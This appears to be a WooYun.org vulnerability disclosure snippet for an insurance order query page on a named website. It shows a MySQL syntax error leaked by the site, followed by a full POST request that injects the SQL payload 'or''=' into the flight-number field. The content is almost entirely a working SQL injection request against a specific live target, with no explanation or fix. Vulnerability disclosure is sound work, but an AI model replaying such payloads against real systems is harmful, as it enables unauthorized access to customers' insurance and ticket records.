WooYun.org

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2014-12-1 0:00:00' AND CreateTime <'2014-12-6 23:59:59'' at line 1

POST http://www.510bx.com/Insurance/InsuranceOrderQuery.aspx?DeptID=228147
txtInsuranceOrderId=11&txtTicketOrderId=&txtStartTime=2014-10-01&txtEndTime=2014-11-30&txtInsuranceName=&txtInsuranceNo=&txtflightNo='or''='&txtTicket=&airStartTime=&airEndTime=&orderStatus=%C8%AB%B2%BF&txtPNRCode=&BtnSearch=%B2%E9%D1%AF&wcfGrid%24ctl04%24txtPage=0